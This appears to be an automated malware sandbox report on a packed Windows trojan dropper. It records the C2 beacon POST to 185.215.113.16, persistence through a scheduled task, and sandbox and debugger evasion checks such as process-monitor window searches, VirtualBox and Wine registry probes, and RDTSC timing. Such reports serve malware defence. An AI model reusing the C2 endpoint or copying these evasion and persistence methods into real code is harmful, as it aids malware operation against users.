Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.16

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 5_2_0022BD60 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile,

5_2_0022BD60

Source: unknown

HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#h
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2h
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php3i
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php4
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php8
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpBi
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpL
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpPh
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpQi
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpd
Source: axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phph
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpiP
Source: axplong.exe, 00000005.00000002.3453927497.0000000000DA0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000005.00000002.3453927497.0000000000E2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpoh
Source: axplong.exe, 00000005.00000002.3453927497.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpsK

System Summary

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_00263068	5_2_00263068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_00224CF0	5_2_00224CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_00257D83	5_2_00257D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_0026765B	5_2_0026765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_00224AF0	5_2_00224AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_00268720	5_2_00268720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_00266F09	5_2_00266F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_0026777B	5_2_0026777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 5_2_00262BD0	5_2_00262BD0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9973018136920981
Source: file.exe	Static PE information: Section: qvaauuzo ZLIB complexity 0.9943085325836659
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9973018136920981
Source: axplong.exe.0.dr	Static PE information: Section: qvaauuzo ZLIB complexity 0.9943085325836659

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: file.exe

Static file information: File size 1870848 > 1048576

Source: file.exe

Static PE information: Raw size of qvaauuzo is bigger than: 0x100000 < 0x197200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.d70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 5.2.axplong.exe.220000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qvaauuzo:EW;ezuxwngn:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1cacdf should be: 0x1d59e3
Source: file.exe	Static PE information: real checksum: 0x1cacdf should be: 0x1d59e3

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: qvaauuzo
Source: file.exe	Static PE information: section name: ezuxwngn
Source: file.exe	Static PE information: section name: .taggant
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: qvaauuzo
Source: axplong.exe.0.dr	Static PE information: section name: ezuxwngn
Source: axplong.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 5_2_0023D84C push ecx; ret

5_2_0023D85F

Source: file.exe	Static PE information: section name: entropy: 7.983537671384169
Source: file.exe	Static PE information: section name: qvaauuzo entropy: 7.953327173780446
Source: axplong.exe.0.dr	Static PE information: section name: entropy: 7.983537671384169
Source: axplong.exe.0.dr	Static PE information: section name: qvaauuzo entropy: 7.953327173780446

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E8CC second address: F5E8D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E8D4 second address: F5E8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E8D8 second address: F5E909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE9502C66h 0x00000007 jmp 00007F4FE9502C61h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E909 second address: F5E918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jc 00007F4FE915D6ACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DB7E second address: F5DBA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4FE9502C69h 0x00000009 jbe 00007F4FE9502C56h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DBA1 second address: F5DBD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4FE915D6B0h 0x00000007 jmp 00007F4FE915D6B8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5DD65 second address: F5DD6F instructions: 0x00000000 rdtsc 0x00000002 js 00007F4FE9502C5Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E012 second address: F5E01C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F4FE915D6A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5E01C second address: F5E03E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F4FE9502C66h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FB84 second address: F5FBA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4FE915D6B3h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FBA3 second address: F5FBA9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FBA9 second address: F5FBAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FBAF second address: F5FBB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FEFE second address: F5FF1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4FE915D6B0h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F5FF1C second address: F5FF20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E255 second address: F7E259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E259 second address: F7E25F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E3BF second address: F7E3C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E65E second address: F7E67F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push edx 0x00000007 jo 00007F4FE9502C56h 0x0000000d pop edx 0x0000000e pushad 0x0000000f jmp 00007F4FE9502C60h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E67F second address: F7E6A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4FE915D6B8h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E6A2 second address: F7E6A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E7FD second address: F7E81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007F4FE915D6B4h 0x0000000b jo 00007F4FE915D6A6h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E81E second address: F7E82A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 je 00007F4FE9502C56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E82A second address: F7E82E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E82E second address: F7E83C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F4FE9502C62h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E83C second address: F7E842 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E842 second address: F7E862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4FE9502C63h 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7E862 second address: F7E866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7EC45 second address: F7EC49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7EC49 second address: F7EC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push edi 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FB04 second address: F7FB0E instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4FE9502C56h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FD9A second address: F7FD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: F7FD9E second address: F7FDA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
